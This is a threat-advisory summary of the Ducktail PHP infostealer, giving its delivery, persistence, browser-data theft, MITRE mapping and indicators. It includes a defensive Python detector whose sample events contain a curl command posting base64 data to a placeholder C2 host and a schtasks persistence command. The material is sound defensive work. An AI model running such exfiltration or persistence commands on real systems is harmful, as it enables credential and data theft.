An Emerging Ducktail Infostealer – Active IOCs – Rewterz

A campaign featuring a PHP-based Ducktail Infostealer is being distributed as fake installers for popular software, games, and other content. The actors, a Vietnamese threat group, have focused on Facebook Business accounts and have evolved their delivery and techniques since 2021.

Keypoints

  • The Ducktail Infostealer variant discussed is the PHP version, disguised as cracked/free installers hosted on file-sharing platforms.
  • Originally targeted Facebook Business accounts to manipulate pages and harvest financial information; the group shifted from targeting specific high-level users to broader audiences.
  • Earlier Ducktail relied on .NET Core and Telegram for C2; the August 2022 campaign introduced a PHP-based stealer with new TTPs.
  • The dropper uses a fake installer, creates temporary files, re-launches with /Silent, and drops components at a chosen location; persistence is achieved via scheduled tasks that run the payload daily.
  • Data theft includes browser information, cookies, Chrome local state, wallet.dat, and other data; the malware decrypts Chrome data in memory and transmits via a PHP/CURL-based C2 channel using base64 encoding.
  • Targeted data includes Facebook Graph API, Ads Manager, and Facebook Business accounts; the C2 supplies a list of folders/URLs in JSON for further data collection.
  • Indicators of Compromise include numerous domains, MD5, SHA-256, and SHA-1 hashes linked to the campaign (see below).

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – The PHP script performs actions such as fetching browser information and sending data to the C2. Quoted from the advisory: “…The PHP script creates PHP associative arrays to prepare for data transmission to the C&C server. The CURL command is used for sending and receiving files over HTTP…”
  • [T1053] Scheduled Task – Persistence is achieved by scheduling tasks to execute the malicious payload daily and at regular intervals. Quoted from the advisory: “…scheduling tasks to execute the malicious payload, named ‘libbridged.exe,’ daily and at regular intervals…”
  • [T1027] Obfuscated/Compressed Files and Information – The stealer code is decrypted at runtime in memory. Quoted from the advisory: “…decrypting the stealer code at runtime in memory.”
  • [T1132] Data Encoding – Stolen data is encoded to base64 before exfiltration. Quoted from the advisory: “…encodes stolen information to base64, and saves it to log files.”
  • [T1071.001] Web Protocols – Data is exfiltrated via HTTP using CURL to communicate with the C2 server. Quoted from the advisory: “…The CURL command is used for sending and receiving files over HTTP, and specific switches are employed during communication.”
  • [T1555.003] Credentials in Web Browsers – The malware retrieves and decrypts data from Chrome, including cookies and local state, as part of data collection. Quoted from the advisory: “…decrypts sensitive data protected by Chrome’s local data encryption, encodes stolen information to base64…”
  • [T1033] Account Discovery – Targeting Facebook Business accounts and gathering account details aligns with enumerating user accounts/assets. Quoted from the advisory: “…targets Facebook Business accounts, including Facebook API graph, Facebook Ads Manager, and Facebook Business accounts, to gather account details…”
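As an added defensive example (not code from the advisory or from Rewterz), the script below runs three detections drawn from the Keypoints and MITRE techniques above over a few constructed process-creation events: the installer relaunching itself with /Silent, a daily scheduled task whose action lives in a user-writable directory, and php.exe driving curl with a base64-looking POST body. The event line format, the task name "Updater", the user name and the C2 host are constructed assumptions, not values from the advisory.

```python
import base64
import re

# Constructed sample process-creation events in the form
# "parent_image -> child_image command_line"; not telemetry from the advisory.
SAMPLE_EVENTS = [
    r'explorer.exe -> Setup_Game.exe "C:\Users\u\Downloads\Setup_Game.exe"',
    r'Setup_Game.exe -> Setup_Game.exe "C:\Users\u\Downloads\Setup_Game.exe" /Silent',
    r'Setup_Game.exe -> schtasks.exe schtasks /create /sc daily /tn Updater /tr "C:\Users\u\AppData\Local\Temp\libbridged.exe"',
    r'libbridged.exe -> php.exe php.exe -q "C:\Users\u\AppData\Local\Temp\index.php"',
    r'php.exe -> curl.exe curl -X POST -d "data=U3RvbGVuIGNvb2tpZXM=" http://c2.invalid/api',
    r'svchost.exe -> schtasks.exe schtasks /create /sc daily /tn Backup /tr "C:\Program Files\Backup\backup.exe"',
]

EVENT_RE = re.compile(r"^(?P<parent>\S+) -> (?P<image>\S+) (?P<cmd>.*)$")
TASK_ACTION_RE = re.compile(r'/tr\s+"?([^"]+)', re.IGNORECASE)
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\")


def looks_base64(token):
    """True if token is well-formed base64 (strict alphabet, padded length)."""
    try:
        base64.b64decode(token, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return len(token) % 4 == 0


def detect(events):
    """Return (rule_name, event_index) pairs for the behaviours described above."""
    hits = []
    for i, line in enumerate(events):
        m = EVENT_RE.match(line)
        if not m:
            continue
        parent, image, cmd = m["parent"].lower(), m["image"].lower(), m["cmd"]
        # 1. Dropper re-launching its own image with the /Silent switch
        if parent == image and "/silent" in cmd.lower():
            hits.append(("silent_self_relaunch", i))
        # 2. Daily scheduled task whose action points into a user-writable path
        if image == "schtasks.exe" and "/sc daily" in cmd.lower():
            action = TASK_ACTION_RE.search(cmd)
            if action and any(d in action.group(1).lower() for d in USER_WRITABLE):
                hits.append(("daily_task_user_writable_path", i))
        # 3. PHP interpreter spawning curl with a base64-looking request body
        if parent == "php.exe" and image == "curl.exe":
            if any(looks_base64(t) for t in B64_TOKEN_RE.findall(cmd)):
                hits.append(("php_curl_base64_exfil", i))
    return hits
```

The benign schtasks event pointing at Program Files is deliberately left unflagged, so the path check is what separates the two task creations.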

Indicators of Compromise

  • [Domain Name] – Example domains observed include slmg.online, roberthalfchro.online, and 13 more domains (domain indicators listed in the article).
  • [MD5] – Example hashes: df4588057abcf11a666891f4edbac6cb, 7956af4e60ce3cf7b36ca520ab0ea201, and 2 more hashes (listed in the article).
  • [SHA-256] – Example hashes: f3015c46ff2103431b383514591e1c1bf348119475c6a183066d3b8f6a896bca, 9f8e5f98f6ed3f63fb9266fde5f36b3bff242e8ebedbe6130558c65fde8addf7, and 2 more hashes (listed in the article).
  • [SHA-1] – Example hashes: 09b88e2314ae1ebab6db6d4e40d68a912a025bee, 44de6f5007090c84ff00f0b226b3f159dfbb6864, and 2 more hashes (listed in the article).

Read more: https://www.rewterz.com/threat-advisory/an-emerging-ducktail-infostealer-active-iocs-9